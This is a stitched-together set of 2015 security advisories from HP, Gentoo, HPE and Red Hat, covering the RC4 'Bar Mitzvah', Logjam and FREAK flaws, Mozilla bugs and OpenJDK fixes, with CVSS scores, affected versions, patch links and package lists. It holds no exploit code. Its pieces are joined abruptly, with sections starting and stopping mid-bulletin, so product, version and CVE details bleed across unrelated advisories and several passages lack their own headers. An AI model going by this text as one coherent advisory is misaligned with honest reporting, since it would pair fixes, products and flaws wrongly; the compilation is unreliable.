The RC4 algorithm, as used in the TLS protocol and SSL protocol, does not properly combine state data with key data during the initialization phase, which makes it easier for remote attackers to conduct plaintext-recovery attacks against the initial bytes of a stream by sniffing network traffic that occasionally relies on keys affected by the Invariance Weakness, and then using a brute-force approach involving LSB values, aka the "Bar Mitzvah" issue. The RC4 algorithm, as used in SSL/TLS is prone to a security weakness that may allow attackers to recover plain-text. Successfully exploiting this issue in conjunction with other latent vulnerabilities may allow attackers to gain access to sensitive information that may aid in further attacks. RC4 is a stream encryption algorithm with variable key length developed by American software developer Ronald Rivest. The algorithm consists of a pseudo-random number generator and an XOR operation, and supports encryption and decryption using the same key. There is a security loophole in the RC4 algorithm used in the TLS protocol and the SSL protocol. The loophole stems from the fact that the program does not correctly combine state data and key data during the initialization phase. A remote attacker can exploit this vulnerability to perform a plaintext-recovery attack on the initialization bytes in the data stream by sniffing specific network traffic and then conducting a brute force attack. v9.1x, v9.2x, v10.0x HP Network Node Manager iSPI Performance for QA v9.0x, v9.1x, v9.2x, v10.0x HP Network Node Manager iSPI for IP Multicast QA v9.0x, v9.1x, v9.2x, v10.0x HP Network Node Manager iSPI for MPLS VPN v9.0x, v9.1x, v9.2x, v10.0x HP Network Node Manager iSPI for IP Telephony v9.0x, v9.1x, v9.2x, v10.0x HP Network Node Manager iSPI for NET v9.0x, v9.1x, v9.2x, v10.0x HP Network Node Manager iSPI Performance for Metrics v9.0x, v9.1x, v9.2x, v10.0x HP Network Node Manager iSPI Performance for Traffic v9.0x, v9.1x, v9.2x, v10.0x
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2015-4000 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-2808 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2015-0204 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates for HP Network Node Manager i and Smart Plugins (iSPIs)
HP Network Node Manager i and Smart Plugins (iSPIs) Version Link to update for CVE-2015-4000 (LogJam)
HP Network Node Manager i version v9.1x, v9.2x iSPI Performance for QA iSPI for IP Multicast iSPI for MPLS VPN iSPI for IP Telephony
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01704653
HP Network Node Manager iSPI for Metrics v9.1x, v9.2x https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01740484
HP Network Node Manager iSPI for Traffic v9.1x, v9.2x https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01740489
Note: v10.x is not affected by LogJam
HP Network Node Manager i and Smart Plugins (iSPIs) Version Link to update for CVE-2015-2808 (Bar Mitzvah)
HP Network Node Manager i version v9.1x, v9.2x, v10.x iSPI Performance for QA iSPI for IP Multicast iSPI for MPLS VPN iSPI for IP Telephony
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01704651
HP Network Node Manager iSPI for Metrics v9.1x, v9.2x, v10.0x https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01740486
HP Network Node Manager iSPI for Traffic v9.1x, v9.2x, v10.0x https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01740487
HP Network Node Manager i and Smart Plugins (iSPIs) Version Link to update for CVE-2015-0204 (Freak)
HP Network Node Manager i version v9.x, v10.x iSPI Performance for QA iSPI for IP Multicast iSPI for MPLS VPN iSPI for IP Telephony
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01704633https://softwaresupport.hp.com/group/softwaresupport/ search-result/-/facetsearch/document/KM01704633
HP Network Node Manager iSPI for Metrics v9.1x, v9.2x https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01740481
HP Network Node Manager iSPI for Traffic v9.1x, v9.2x https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetse arch/document/KM01740488
Note: v10.x is not affected by FREAK
HISTORY Version:1 (rev.1) - 20 August 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. HP Performance Manager v9.0x and v9.20. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201512-10
https://security.gentoo.org/
Severity: Normal Title: Mozilla Products: Multiple vulnerabilities Date: December 30, 2015 Bugs: #545232, #554036, #556942, #564818, #568376 ID: 201512-10
Synopsis
Multiple vulnerabilities have been found in Mozilla Firefox and Thunderbird, the worst of which may allow user-assisted execution of arbitrary code.
Background
Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-client/firefox < 38.5.0 >= 38.5.0 2 www-client/firefox-bin < 38.5.0 >= 38.5.0 3 mail-client/thunderbird < 38.5.0 >= 38.5.0 4 mail-client/thunderbird-bin < 38.5.0 >= 38.5.0 ------------------------------------------------------------------- 4 affected packages
Description
Multiple vulnerabilities have been discovered in Mozilla Firefox and Mozilla Thunderbird. Please review the CVE identifiers referenced below for details.
Impact
A remote attacker could entice a user to view a specially crafted web page or email, possibly resulting in execution of arbitrary code or a Denial of Service condition.
Workaround
There is no known workaround at this time.
Resolution
All Firefox users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-38.5.0"
All Firefox-bin users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=www-client/firefox-bin-38.5.0"
All Thunderbird users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=mail-client/thunderbird-38.5.0"=
All Thunderbird-bin users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=mail-client/thunderbird-bin-38.5.0"
References
[ 1 ] CVE-2015-0798 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0798 [ 2 ] CVE-2015-0799 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0799 [ 3 ] CVE-2015-0801 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0801 [ 4 ] CVE-2015-0802 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0802 [ 5 ] CVE-2015-0803 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0803 [ 6 ] CVE-2015-0804 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0804 [ 7 ] CVE-2015-0805 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0805 [ 8 ] CVE-2015-0806 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0806 [ 9 ] CVE-2015-0807 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0807 [ 10 ] CVE-2015-0808 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0808 [ 11 ] CVE-2015-0810 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0810 [ 12 ] CVE-2015-0811 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0811 [ 13 ] CVE-2015-0812 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0812 [ 14 ] CVE-2015-0813 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0813 [ 15 ] CVE-2015-0814 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0814 [ 16 ] CVE-2015-0815 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0815 [ 17 ] CVE-2015-0816 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0816 [ 18 ] CVE-2015-2706 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2706 [ 19 ] CVE-2015-2721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2721 [ 20 ] CVE-2015-2722 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2722 [ 21 ] CVE-2015-2724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2724 [ 22 ] CVE-2015-2725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2725 [ 23 ] CVE-2015-2726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2726 [ 24 ] CVE-2015-2727 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2727 [ 25 ] CVE-2015-2728 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2728 [ 26 ] CVE-2015-2729 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2729 [ 27 ] CVE-2015-2730 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2730 [ 28 ] CVE-2015-2731 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2731 [ 29 ] CVE-2015-2733 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2733 [ 30 ] CVE-2015-2734 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2734 [ 31 ] CVE-2015-2735 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2735 [ 32 ] CVE-2015-2736 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2736 [ 33 ] CVE-2015-2737 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2737 [ 34 ] CVE-2015-2738 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2738 [ 35 ] CVE-2015-2739 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2739 [ 36 ] CVE-2015-2740 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2740 [ 37 ] CVE-2015-2741 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2741 [ 38 ] CVE-2015-2742 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2742 [ 39 ] CVE-2015-2743 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2743 [ 40 ] CVE-2015-2808 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2808 [ 41 ] CVE-2015-4000 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4000 [ 42 ] CVE-2015-4495 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4495 [ 43 ] CVE-2015-4513 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4513 [ 44 ] CVE-2015-4514 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4514 [ 45 ] CVE-2015-4515 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4515 [ 46 ] CVE-2015-4518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4518 [ 47 ] CVE-2015-7181 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7181 [ 48 ] CVE-2015-7182 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7182 [ 49 ] CVE-2015-7183 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7183 [ 50 ] CVE-2015-7187 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7187 [ 51 ] CVE-2015-7188 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7188 [ 52 ] CVE-2015-7189 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7189 [ 53 ] CVE-2015-7191 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7191 [ 54 ] CVE-2015-7192 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7192 [ 55 ] CVE-2015-7193 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7193 [ 56 ] CVE-2015-7194 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7194 [ 57 ] CVE-2015-7195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7195 [ 58 ] CVE-2015-7196 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7196 [ 59 ] CVE-2015-7197 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7197 [ 60 ] CVE-2015-7198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7198 [ 61 ] CVE-2015-7199 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7199 [ 62 ] CVE-2015-7200 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7200 [ 63 ] CVE-2015-7201 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7201 [ 64 ] CVE-2015-7202 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7202 [ 65 ] CVE-2015-7203 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7203 [ 66 ] CVE-2015-7204 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7204 [ 67 ] CVE-2015-7205 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7205 [ 68 ] CVE-2015-7207 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7207 [ 69 ] CVE-2015-7208 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7208 [ 70 ] CVE-2015-7210 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7210 [ 71 ] CVE-2015-7211 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7211 [ 72 ] CVE-2015-7212 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7212 [ 73 ] CVE-2015-7213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7213 [ 74 ] CVE-2015-7214 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7214 [ 75 ] CVE-2015-7215 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7215 [ 76 ] CVE-2015-7216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7216 [ 77 ] CVE-2015-7217 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7217 [ 78 ] CVE-2015-7218 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7218 [ 79 ] CVE-2015-7219 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7219 [ 80 ] CVE-2015-7220 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7220 [ 81 ] CVE-2015-7221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7221 [ 82 ] CVE-2015-7222 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7222 [ 83 ] CVE-2015-7223 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7223
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/201512-10
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2015 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . These vulnerabilities could be exploited remotely resulting in disclosure of information and other impacts including:
- The MD5 Message-Digest Algorithm is not collision resistant, which makes it easier for context-dependent attackers to conduct spoofing attacks, as demonstrated by attacks on the use of MD5 in the signature algorithm of an X.509 certificate.
-
HPE iMC PLAT - Please refer to the RESOLUTION below for a list of impacted products.
-
iMC PLAT - Version: IMC PLAT 7.2, E0403P10
- JD125A HP IMC Std S/W Platform w/100-node
- JD126A HP IMC Ent S/W Platform w/100-node
- JD808A HP IMC Ent Platform w/100-node License
- JD814A HP A-IMC Enterprise Edition Software DVD Media
- JD815A HP IMC Std Platform w/100-node License
- JD816A HP A-IMC Standard Edition Software DVD Media
- JF288AAE HP Network Director to Intelligent Management Center Upgrade E-LTU
- JF289AAE HP Enterprise Management System to Intelligent Management Center Upgrade E-LTU
- JF377A HP IMC Std S/W Platform w/100-node Lic
- JF377AAE HP IMC Std S/W Pltfrm w/100-node E-LTU
- JF378A HP IMC Ent S/W Platform w/200-node Lic
- JF378AAE HP IMC Ent S/W Pltfrm w/200-node E-LTU
- JG546AAE HP IMC Basic SW Platform w/50-node E-LTU
- JG548AAE HP PCM+ to IMC Bsc Upgr w/50-node E-LTU
- JG549AAE HP PCM+ to IMC Std Upgr w/200-node E-LTU
- JG747AAE HP IMC Std SW Plat w/ 50 Nodes E-LTU
- JG748AAE HP IMC Ent SW Plat w/ 50 Nodes E-LTU
- JG550AAE HPE PCM+ Mobility Manager to IMC Basic WLAN Platform Upgrade 50-node and 150-AP E-LTU
- JG590AAE HPE IMC Basic WLAN Manager Software Platform 50 Access Point E-LTU
- JG660AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
- JG766AAE HP IMC Smart Connect Virtual Appliance Edition E-LTU
- JG767AAE HP IMC Smart Connect with Wireless Manager Virtual Appliance Edition E-LTU
- JG768AAE HPE PCM+ to IMC Standard Software Platform Upgrade with 200-node E-LTU
Note: Please contact HPE Technical Support if any assistance is needed acquiring the software updates. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hpe.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04832246
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04832246 Version: 1
HPSBUX03512 SSRT102254 rev.1 - HP-UX Web Server Suite running Apache, Remote Denial of Service (DoS) and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2015-10-15 Last Updated: 2015-10-15
Potential Security Impact: Remote Denial of Service (DoS), access restriction bypass, unauthorized modification, disclosure of information, local access restriction bypass
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX Web Server Suite running Apache. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS) and other impacts including...
- The TLS vulnerability using US export-grade 512-bit keys in Diffie-Hellman key exchange known as "Logjam" could be exploited remotely to allow unauthorized modification.
- The RC4 stream cipher vulnerability in SSL/TLS known as "Bar Mitzvah" could be exploited remotely to allow disclosure of information.
References:
CVE-2013-5704 CVE-2014-0118 CVE-2014-0226 CVE-2014-0231 CVE-2015-3183 CVE-2015-4000 - "Logjam" CVE-2015-2808 - "Bar Mitzvah" SSRT102254
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX Web Server Suite 2.2.15.21 Apache
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-5704 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2014-0118 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0226 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0231 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2015-3183 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2015-4000 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2015-2808 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software updates to resolve the vulnerabilities with HP-UX Web Server Suite running Apache.
The updates are available for download from http://software.hp.com
NOTE: HP-UX Web Server Suite v3.31 HPUXWSATW331 contains the following components:
- Apache v2.2.15.23
- Tomcat Servlet Engine 5.5.36.02
- PHP 5.2.17.04
HP-UX 11i Release Apache Depot name
B.11.23 (11i v2 32-bit) HP_UX_11.23_HP_UX_11.23_HPUXWS22ATW-B331-11-23-32.depot
B.11.23 (11i v2 64-bit) HP_UX_11.23_HP_UX_11.23_HPUXWS22ATW-B331-11-23-64.depot
MANUAL ACTIONS: Yes - Update Download and install the software update
PRODUCT SPECIFIC INFORMATION HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23
hpuxws22APACHE32.APACHE hpuxws22APACHE32.APACHE2 hpuxws22APACHE32.AUTH_LDAP hpuxws22APACHE32.AUTH_LDAP2 hpuxws22APACHE32.MOD_JK hpuxws22APACHE32.MOD_JK2 hpuxws22APACHE32.MOD_PERL hpuxws22APACHE32.MOD_PERL2 hpuxws22APACHE32.PHP hpuxws22APACHE32.PHP2 hpuxws22APACHE32.WEBPROXY hpuxws22APACHE32.WEBPROXY2 hpuxws22APACHE.APACHE hpuxws22APACHE.APACHE2 hpuxws22APACHE.AUTH_LDAP hpuxws22APACHE.AUTH_LDAP2 hpuxws22APACHE.MOD_JK hpuxws22APACHE.MOD_JK2 hpuxws22APACHE.MOD_PERL hpuxws22APACHE.MOD_PERL2 hpuxws22APACHE.PHP hpuxws22APACHE.PHP2 hpuxws22APACHE.WEBPROXY hpuxws22APACHE.WEBPROXY2 action: install revision B.2.2.15.18 or subsequent
hpuxws22TOMCAT32.TOMCAT hpuxws22TOMCAT.TOMCAT action: install revision C.6.0.35.01 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 15 October 2015 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2015 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory page, listed in the References section. Customers unable to apply the update should contact HPE Support to discuss options. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Critical: java-1.7.0-openjdk security update Advisory ID: RHSA-2015:1229-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1229.html Issue date: 2015-07-15 CVE Names: CVE-2015-2590 CVE-2015-2601 CVE-2015-2621 CVE-2015-2625 CVE-2015-2628 CVE-2015-2632 CVE-2015-2808 CVE-2015-4000 CVE-2015-4731 CVE-2015-4732 CVE-2015-4733 CVE-2015-4748 CVE-2015-4749 CVE-2015-4760 =====================================================================
- Summary:
Updated java-1.7.0-openjdk packages that fix multiple security issues are now available for Red Hat Enterprise Linux 6 and 7.
Red Hat Product Security has rated this update as having Critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client (v. 7) - x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64 Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux HPC Node (v. 6) - x86_64 Red Hat Enterprise Linux HPC Node Optional (v. 6) - noarch, x86_64 Red Hat Enterprise Linux Server (v. 6) - i386, x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64
- Description:
The java-1.7.0-openjdk packages provide the OpenJDK 7 Java Runtime Environment and the OpenJDK 7 Java Software Development Kit.
Multiple flaws were discovered in the 2D, CORBA, JMX, Libraries and RMI components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions. (CVE-2015-4760, CVE-2015-2628, CVE-2015-4731, CVE-2015-2590, CVE-2015-4732, CVE-2015-4733)
A flaw was found in the way the Libraries component of OpenJDK verified Online Certificate Status Protocol (OCSP) responses. An OCSP response with no nextUpdate date specified was incorrectly handled as having unlimited validity, possibly causing a revoked X.509 certificate to be interpreted as valid. (CVE-2015-4748)
It was discovered that the JCE component in OpenJDK failed to use constant time comparisons in multiple cases. An attacker could possibly use these flaws to disclose sensitive information by measuring the time used to perform operations using these non-constant time comparisons. (CVE-2015-2601)
A flaw was found in the RC4 encryption algorithm. When using certain keys for RC4 encryption, an attacker could obtain portions of the plain text from the cipher text without the knowledge of the encryption key. (CVE-2015-2808)
Note: With this update, OpenJDK now disables RC4 TLS/SSL cipher suites by default to address the CVE-2015-2808 issue. Refer to Red Hat Bugzilla bug 1207101, linked to in the References section, for additional details about this change.
A flaw was found in the way the TLS protocol composed the Diffie-Hellman (DH) key exchange. A man-in-the-middle attacker could use this flaw to force the use of weak 512 bit export-grade keys during the key exchange, allowing them do decrypt all traffic. (CVE-2015-4000)
Note: This update forces the TLS/SSL client implementation in OpenJDK to reject DH key sizes below 768 bits, which prevents sessions to be downgraded to export-grade keys. Refer to Red Hat Bugzilla bug 1223211, linked to in the References section, for additional details about this change.
It was discovered that the JNDI component in OpenJDK did not handle DNS resolutions correctly. An attacker able to trigger such DNS errors could cause a Java application using JNDI to consume memory and CPU time, and possibly block further DNS resolution. (CVE-2015-4749)
Multiple information leak flaws were found in the JMX and 2D components in OpenJDK. An untrusted Java application or applet could use this flaw to bypass certain Java sandbox restrictions. (CVE-2015-2621, CVE-2015-2632)
A flaw was found in the way the JSSE component in OpenJDK performed X.509 certificate identity verification when establishing a TLS/SSL connection to a host identified by an IP address. In certain cases, the certificate was accepted as valid if it was issued for a host name to which the IP address resolves rather than for the IP address. (CVE-2015-2625)
Note: If the web browser plug-in provided by the icedtea-web package was installed, the issues exposed via Java applets could have been exploited without user interaction if a user visited a malicious website.
All users of java-1.7.0-openjdk are advised to upgrade to these updated packages, which resolve these issues. All running instances of OpenJDK Java must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1207101 - CVE-2015-2808 SSL/TLS: "Invariance Weakness" vulnerability in RC4 stream cipher 1223211 - CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks 1241965 - CVE-2015-2625 OpenJDK: name for reverse DNS lookup used in certificate identity check (JSSE, 8067694) 1242019 - CVE-2015-2601 OpenJDK: non-constant time comparisons in crypto code (JCE, 8074865) 1242232 - CVE-2015-2628 OpenJDK: IIOPInputStream type confusion vulnerability (CORBA, 8076376) 1242234 - CVE-2015-4731 OpenJDK: improper permission checks in MBeanServerInvocationHandler (JMX, 8076397) 1242240 - CVE-2015-4732 OpenJDK: insufficient context checks during object deserialization (Libraries, 8076405) 1242275 - CVE-2015-4733 OpenJDK: RemoteObjectInvocationHandler allows calling finalize() (RMI, 8076409) 1242281 - CVE-2015-4748 OpenJDK: incorrect OCSP nextUpdate checking (Libraries, 8075374) 1242372 - CVE-2015-2621 OpenJDK: incorrect code permission checks in RMIConnectionImpl (JMX, 8075853) 1242379 - CVE-2015-4749 OpenJDK: DnsClient fails to release request information after error (JNDI, 8075378) 1242394 - CVE-2015-2632 ICU: integer overflow in LETableReference verifyLength() (OpenJDK 2D, 8077520) 1242447 - CVE-2015-4760 ICU: missing boundary checks in layout engine (OpenJDK 2D, 8071715) 1243139 - CVE-2015-2590 OpenJDK: deserialization issue in ObjectInputStream.readSerialData() (Libraries, 8076401)
- Package List:
Red Hat Enterprise Linux Desktop (v. 6):
Source: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.src.rpm
i386: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.i686.rpm
x86_64: java-1.7.0-openjdk-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm java-1.7.0-openjdk-devel-1.7.0.85-2.6.1.3.el6_6.x86_64.rpm
Red Hat Enterprise Linux Desktop Optional (v. 6):
i386: java-1.7.0-openjdk-debuginfo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-demo-1.7.0.85-2.6.1.3.el6_6.i686.rpm java-1.7.0-openjdk-src-1.7.0.85-2.6.1.3.el6_6.i686.rpm
noarch: java-1.7.0-openjdk-javadoc-1.7.0.85-2.6.1.3.el6_6.noarch.rpm
